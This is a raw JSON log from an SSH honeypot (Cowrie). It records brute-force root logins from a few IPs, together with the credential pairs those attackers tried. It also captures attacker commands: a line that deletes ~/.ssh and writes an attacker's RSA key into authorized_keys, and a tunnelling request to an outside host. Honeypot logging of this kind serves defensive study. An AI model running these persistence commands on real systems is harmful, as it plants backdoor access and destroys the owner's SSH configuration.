{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.704799Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.748440Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:14:58.927034Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.927783Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.968003Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.968845Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":46684,"dst_ip":"1.2.3.4","dst_port":22,"session":"6267c4c96a5c","protocol":"ssh","message":"New connection: 77.75.56.63:46684 (1.2.3.4:22) [session: 6267c4c96a5c]","sensor":"my-vps","timestamp":"2025-09-08T20:14:59.006769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:14:59.009774Z","src_ip":"77.75.56.63","session":"6267c4c96a5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:14:59.045847Z","src_ip":"77.75.56.63","session":"6267c4c96a5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:14:59.246002Z","src_ip":"77.75.56.63","session":"6267c4c96a5c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.286029Z","src_ip":"77.75.56.63","session":"6267c4c96a5c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":46698,"dst_ip":"1.2.3.4","dst_port":22,"session":"293735dcc4e8","protocol":"ssh","message":"New connection: 77.75.56.63:46698 (1.2.3.4:22) [session: 293735dcc4e8]","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.321295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.321978Z","src_ip":"77.75.56.63","session":"293735dcc4e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.361619Z","src_ip":"77.75.56.63","session":"293735dcc4e8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.549483Z","src_ip":"77.75.56.63","session":"293735dcc4e8"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.595204Z","src_ip":"77.75.56.63","session":"293735dcc4e8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:15:00.602542Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":37668,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b1b22701a50","protocol":"ssh","message":"New connection: 103.206.72.2:37668 (1.2.3.4:22) [session: 3b1b22701a50]","sensor":"my-vps","timestamp":"2025-09-08T20:15:54.894711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:15:54.899263Z","src_ip":"103.206.72.2","session":"3b1b22701a50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:15:55.071428Z","src_ip":"103.206.72.2","session":"3b1b22701a50"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"2025","message":"login attempt [hunter/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T20:15:55.771177Z","src_ip":"103.206.72.2","session":"3b1b22701a50"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:15:56.950156Z","src_ip":"103.206.72.2","session":"3b1b22701a50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38620,"dst_ip":"1.2.3.4","dst_port":22,"session":"58ca46713757","protocol":"ssh","message":"New connection: 212.227.235.229:38620 (1.2.3.4:22) [session: 58ca46713757]","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.162504Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.163779Z","src_ip":"212.227.235.229","session":"58ca46713757"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38935,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb9569c05fd","protocol":"ssh","message":"New connection: 212.227.235.229:38935 (1.2.3.4:22) [session: 4eb9569c05fd]","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.333844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.334780Z","src_ip":"212.227.235.229","session":"4eb9569c05fd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.490582Z","src_ip":"212.227.235.229","session":"4eb9569c05fd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:15:59.959542Z","src_ip":"212.227.235.229","session":"4eb9569c05fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T20:16:00.116193Z","session":"4eb9569c05fd"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":54904,"dst_ip":"1.2.3.4","dst_port":22,"session":"e48cb5cf0bfd","protocol":"ssh","message":"New connection: 77.75.56.63:54904 (1.2.3.4:22) [session: e48cb5cf0bfd]","sensor":"my-vps","timestamp":"2025-09-08T20:16:03.950242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:16:03.951190Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.008261Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.login.success","username":"root","password":"dell","message":"login attempt [root/dell] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.304961Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:16:04.503737Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.504628Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.505828Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.589637Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:16:04.780569Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.781220Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":60526,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dc490cc7f13","protocol":"ssh","message":"New connection: 77.75.56.63:60526 (1.2.3.4:22) [session: 6dc490cc7f13]","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.853223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.854012Z","src_ip":"77.75.56.63","session":"6dc490cc7f13"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.865787Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.866737Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:16:04.890347Z","src_ip":"77.75.56.63","session":"6dc490cc7f13"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:16:05.072926Z","src_ip":"77.75.56.63","session":"6dc490cc7f13"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.113404Z","src_ip":"77.75.56.63","session":"6dc490cc7f13"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":60534,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad8bfc38bab","protocol":"ssh","message":"New connection: 77.75.56.63:60534 (1.2.3.4:22) [session: cad8bfc38bab]","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.155195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.156123Z","src_ip":"77.75.56.63","session":"cad8bfc38bab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.196714Z","src_ip":"77.75.56.63","session":"cad8bfc38bab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.408889Z","src_ip":"77.75.56.63","session":"cad8bfc38bab"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.448467Z","src_ip":"77.75.56.63","session":"cad8bfc38bab"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:06.469678Z","src_ip":"77.75.56.63","session":"e48cb5cf0bfd"}
